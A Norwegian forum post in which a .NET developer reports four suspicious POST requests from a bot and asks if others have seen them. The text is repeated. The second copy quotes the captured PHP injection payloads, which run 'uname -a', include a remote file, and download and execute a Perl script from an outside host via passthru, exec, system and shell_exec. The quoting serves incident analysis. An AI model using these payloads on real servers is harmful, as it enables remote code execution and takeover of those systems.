Hei alle.
Jeg hører egentlig til i .Net verdenen. Det skjer fra tid til annen at det dukker opp forsøk på hacking. Og nå tikket det nettop 4 mystiske forespørsler inn på en av disse .Net sidene. Nå ble jeg litt nyskjerrig, i tillegg til at det sikkert er kjekt for noen av dere å bla litt ekstra i loggene i kveld.
Klienten identifiserer seg som "plaNETWORK Bot Search" og kommer fra 72.249.108.140 (ISP: Colo4Dallas LP , Organization: Beach Trader )
Requestene kommer som HttpPost til en gyldig aspx-side med "++%2fcontact.php" lagt til på enden av querystringen.
Formene ser slik ut (kuttet opp for enklere lesbarhet, php-Code her kommer fordi det er omkranset med PHP i brackets.):
Form 1:
send-contactus : 1
author_name :
Form2:
send-contactus : 1
author_name :
Form3:
end-contactus : 1
author_name :
Form 4:
send-contactus : 1
author_name :
Noen som har sett dette før?
Jeg hører egentlig til i .Net verdenen. Det skjer fra tid til annen at det dukker opp forsøk på hacking. Og nå tikket det nettop 4 mystiske forespørsler inn på en av disse .Net sidene. Nå ble jeg litt nyskjerrig, i tillegg til at det sikkert er kjekt for noen av dere å bla litt ekstra i loggene i kveld.
Klienten identifiserer seg som "plaNETWORK Bot Search" og kommer fra 72.249.108.140 (ISP: Colo4Dallas LP , Organization: Beach Trader )
Requestene kommer som HttpPost til en gyldig aspx-side med "++%2fcontact.php" lagt til på enden av querystringen.
Formene ser slik ut (kuttet opp for enklere lesbarhet, php-Code her kommer fordi det er omkranset med PHP i brackets.):
Form 1:
send-contactus : 1
author_name :
PHP:
echo('plaNETWORK ');passthru('uname -a');
echo(' kae');die();
Form2:
send-contactus : 1
author_name :
PHP:
include('http://qikel.fileave.com/ingwe.txt??');
die();
Form3:
end-contactus : 1
author_name :
PHP:
passthru('cd /var/tmp;cd /tmp;lwp-download http://wan5.fileave.com/dos.txt ;
perl dos.txt;curl -O http://wan5.fileave.com/dos.txt -O dos.txt;
perl dos.txt');
exec('cd /var/tmp;cd /tmp;lwp-download http://wan5.fileave.com/dos.txt ;perl dos.txt;curl -O http://wan5.fileave.com/dos.txt -O dos.txt;perl dos.txt');
system('cd /var/tmp;cd /tmp;lwp-download http://wan5.fileave.com/dos.txt ;perl dos.txt;curl -O http://wan5.fileave.com/dos.txt -O dos.txt;perl dos.txt');
shell_exec('cd /var/tmp;cd /tmp;lwp-download http://wan5.fileave.com/dos.txt ;perl dos.txt;
curl -O http://wan5.fileave.com/dos.txt -O dos.txt;perl dos.txt');;
die();
Form 4:
send-contactus : 1
author_name :
PHP:
passthru('cd /var/tmp;cd /var/tmp;cd /tmp;lwp-download http://wan5.fileave.com/dos.txt ;perl dos.txt;curl -O http://wan5.fileave.com/dos.txt -O dos.txt;perl dos.txt');
exec('cd /var/tmp;cd /var/tmp;cd /tmp;lwp-download http://wan5.fileave.com/dos.txt ;perl dos.txt;curl -O http://wan5.fileave.com/dos.txt -O dos.txt;perl dos.txt');
system('cd /var/tmp;cd /var/tmp;cd /tmp;lwp-download http://wan5.fileave.com/dos.txt ;perl dos.txt;curl -O http://wan5.fileave.com/dos.txt -O dos.txt;
perl dos.txt');
shell_exec('cd /var/tmp;cd /var/tmp;cd /tmp;lwp-download http://wan5.fileave.com/dos.txt ;perl dos.txt;
curl -O http://wan5.fileave.com/dos.txt -O dos.txt;perl dos.txt');;
die();
Noen som har sett dette før?